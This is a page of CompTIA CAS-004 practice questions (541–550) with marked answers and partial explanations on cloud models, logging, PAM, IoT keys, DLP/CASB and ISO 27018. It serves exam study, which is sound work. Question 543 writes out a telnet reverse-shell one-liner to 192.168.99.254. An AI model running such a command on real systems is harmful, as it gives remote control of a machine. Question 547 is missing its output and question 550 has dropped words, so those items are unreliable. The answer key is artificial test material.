CompTIA CAS-004 Online Practice Questions and Exam Preparation

CompTIA CAS-004 Online Questions & Answers

• Question 541:

  Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement?

  A. IaaS
  B. SaaS
  C. FaaS
  D. PaaS
  B. SaaS

  ---

  Explanation

• Question 542:

  city government's IT director was notified by the City council that the following cybersecurity requirements must be met to be awarded a large federal grant:

  Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting. All privileged user access must be tightly controlled and tracked to mitigate compromised accounts. Ransomware threats and zero-day vulnerabilities must be quickly identified. Which of the following technologies would BEST satisfy these requirements? (Select THREE).

  A. Endpoint protection
  B. Log aggregator
  C. Zero trust network access
  D. PAM
  E. Cloud sandbox
  F. SIEM
  G. NGFW
  B. Log aggregator
  D. PAM
  F. SIEM

  ---

  Explanation

  Log aggregator: A log aggregator is a tool that collects, parses, and stores logs from various sources, such as devices, applications, servers, etc. A log aggregator can help meet the requirement of retaining logs for 365 days by providing a centralized and scalable storage solution1 . PAM: PAM stands for privileged access management. It is a technology that controls and monitors the access of privileged users (such as administrators) to critical systems and data. PAM can help meet the requirement of controlling and tracking privileged user access by enforcing policies such as least privilege, multifactor authentication, password rotation, session recording, etc. . SIEM: SIEM stands for security information and event management. It is a technology that analyzes and correlates logs from various sources to detect and respond to security incidents. SIEM can help meet the requirement of identifying ransomware threats and zero- day vulnerabilities by providing real-time alerts, threat intelligence feeds, incident response workflows, etc.

• Question 543:

  A penetration tester inputs the following command: telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344 This command will allow the penetration tester to establish a:

  A. port mirror.
  B. network pivot.
  C. reverse shell.
  D. proxy chain.
  C. reverse shell.

  ---

  Explanation

  The command depicted is indicative of a reverse shell, which is a type of shell where the target system initiates an outgoing connection to a remote host, and then standard input and output of the command line interface on the target system is redirected through this connection to the remote host. This is typically used by an attacker after exploitation to open a remote command line interface to control the compromised machine.

• Question 544:

  An IoT device implements an encryption module built within its SoC, where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacture do if the private key is compromised?

  A. Use over-the-air updates to replace the private key.
  B. Manufacture a new IoT device with a redesigned SoC.
  C. Replace the public portion of the IoT key on its servers.
  D. Release a patch for the SoC software.
  B. Manufacture a new IoT device with a redesigned SoC.

  ---

  Explanation

  Manufacture a new IoT device with a redesigned SoC: Write-Once Read-Many (WORM) is specifically designed to adhere to the highest level of integrity. Once written, it cannot be replaced. As for the Private Key compromise, OTA updates and software patches don't work and replacing the public key does nothing. Your only option is to burn it to the ground and start again.

• Question 545:

  A software development company needs to mitigate third-party risks to its software supply chain. Which of the following techniques should the company use in the development environment to best meet this objective?

  A. Performing software composition analysis
  B. Requiring multifactor authentication
  C. Establishing coding standards and monitoring for compliance
  D. Implementing a robust unit and regression-testing scheme
  A. Performing software composition analysis

  ---

  Explanation

  Software composition analysis (SCA) is the most effective method to mitigate third-party risks in a software supply chain. SCA tools analyze the open-source and third- party components used in software development to identify known

  vulnerabilities, outdated dependencies, or licensing issues. By integrating SCA into the development environment, the company can proactively address risks related to external libraries or codebases that may introduce vulnerabilities into the

  software supply chain. CASP+ emphasizes the importance of securing the supply chain, particularly by identifying and addressing risks introduced by third-party software components.

  References:

  CASP+ CAS-004 Exam Objectives: Domain 3.0 ?Enterprise Security Architecture (Third-Party Risk Management)

  CompTIA CASP+ Study Guide: Securing Software Supply Chains with SCA

• Question 546:

  An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?

  A. Perfect forward secrecy on both endpoints
  B. Shared secret for both endpoints
  C. Public keys on both endpoints
  D. A common public key on each endpoint
  E. A common private key on each endpoint
  C. Public keys on both endpoints

  ---

  Explanation

• Question 547:

  A security analyst is reading the results of a successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the exploit is detailed using logs and outputs from the test However, the attack vector of the exploit is missing, making it harder to recommend remediation's. Given the following output:

  

  The penetration testers MOST likely took advantage of:

  A. A TOC/TOU vulnerability
  B. A plain-text password disclosure
  C. An integer overflow vulnerability
  D. A buffer overflow vulnerability
  D. A buffer overflow vulnerability

  ---

  Explanation

• Question 548:

  The Chief Security Officer (CSO) requested the security team implement technical controls that meet the following requirements:

  1.Monitors traffic to and from both local NAS and cloud-based file repositories

  2.Prevents on-site staff who are accessing sensitive customer PII documents on file repositories from accidentally or deliberately sharing sensitive documents on personal SaaS solutions

  3.Uses document attributes to reduce false positives

  4.Is agentless and not installed on staff desktops or laptops

  Which of the following when installed and configured would BEST meet the CSO's requirements? (Choose two.)

  A. DLP
  B. NGFW
  C. UTM
  D. UEBA
  E. CASB
  F. HIPS
  A. DLP
  E. CASB

  ---

  Explanation

• Question 549:

  Which of the following is required for an organization to meet the ISO 27018 standard?

  A. All Pll must be encrypted.
  B. All network traffic must be inspected.
  C. GDPR equivalent standards must be met
  D. COBIT equivalent standards must be met
  C. GDPR equivalent standards must be met

  ---

  Explanation

• Question 550:

  An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.

  Which of the following historian server locations will allow the business to get the required reports in an and IT environment?

  A. In the environment, use a VPN from the IT environment into the environment.
  B. In the environment, allow IT traffic into the environment.
  C. In the IT environment, allow PLCs to send data from the environment to the IT environment.
  D. Use a screened subnet between the and IT environments.
  D. Use a screened subnet between the and IT environments.

  ---

  Explanation